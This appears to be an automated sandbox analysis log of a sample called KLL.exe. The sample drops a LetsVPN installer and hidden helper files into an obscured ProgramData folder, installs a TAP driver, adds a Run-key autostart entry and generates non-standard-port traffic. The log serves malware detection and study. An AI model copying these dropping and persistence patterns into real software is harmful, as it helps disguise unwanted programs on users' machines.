Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsVPNInfraStructure.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Mono.Cecil.Pdb.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Requests.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\ToastNotifications.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\zh-CN\LetsPRO.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Text.Encoding.CodePages.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Mono.Cecil.Mdb.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLite-net.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\SharpCompress.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.NetworkInformation.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.TypeConverter.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Serialization.Primitives.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\FontAwesome.WPF.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Configuration.ConfigurationManager.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.PerformanceCounter.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\driver\tap0901.sys	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Numerics.Vectors.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.Http.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Collections.NonGeneric.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\ToastNotifications.Messages.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.Tools.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\zh-Hant\System.Web.Services.Description.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.WebSockets.Client.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.provider.dynamic_cdecl.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.ThreadPool.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.Debug.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Principal.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\zh-HK\LetsPRO.resources.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KLL.exe	File created: C:\ProgramData\SQBg9\KQ3ts~m8\s	Jump to dropped file
Source: C:\Users\user\Desktop\KLL.exe	File created: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Dynamic.Runtime.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Claims.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Expression.Interactions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Algorithms.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\DeltaCompressionDotNet.PatchApi.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Primitives.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\zh-MO\LetsPRO.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Reflection.Primitives.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Management.Automation.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Serialization.Formatters.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Web.WebView2.Core.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\MdXaml.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Reflection.Extensions.dll	Jump to dropped file
Source: C:\Windows\System32\drvinst.exe	File created: C:\Windows\System32\drivers\SETCB25.tmp	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Xml.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\SuperSocket.Clientuser.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Pipes.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.InteropServices.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.WebSockets.dll	Jump to dropped file

Source: C:\Users\user\Desktop\KLL.exe	File created: C:\ProgramData\SQBg9\KQ3ts~m8\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KLL.exe	File created: C:\ProgramData\SQBg9\KQ3ts~m8\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KLL.exe	File created: C:\ProgramData\letsvpn-latest.exe	Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\ProgramData\SQBg9\KQ3ts~m8\uc_guilib.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KLL.exe	File created: C:\ProgramData\SQBg9\KQ3ts~m8\s	Jump to dropped file
Source: C:\Users\user\Desktop\KLL.exe	File created: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Jump to dropped file

Source: C:\Windows\System32\drvinst.exe	File created: C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}\tap0901.sys (copy)	Jump to dropped file
Source: C:\Windows\System32\drvinst.exe	File created: C:\Windows\System32\drivers\tap0901.sys (copy)	Jump to dropped file
Source: C:\Windows\System32\drvinst.exe	File created: C:\Windows\System32\drivers\SETCB25.tmp	Jump to dropped file
Source: C:\Windows\System32\drvinst.exe	File created: C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}\SETC54B.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\KLL.exe

File created: C:\ProgramData\SQBg9\KQ3ts~m8\s

Jump to dropped file

Source: C:\Windows\System32\drvinst.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tap0901

Source: C:\Windows\System32\svchost.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage

Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\LetsVPN.lnk
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\Uninstall.lnk

Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LetsPRO
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LetsPRO

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 15628
Source: unknown	Network traffic detected: HTTP traffic on port 15628 -> 49722

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe

Code function: 19_2_6CB2B15E IsIconic,

19_2_6CB2B15E

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe

Code function: 19_2_6CDF9850 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

19_2_6CDF9850

Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Lets userHabit

Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\letsvpn-latest.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\letsvpn-latest.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\letsvpn-latest.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
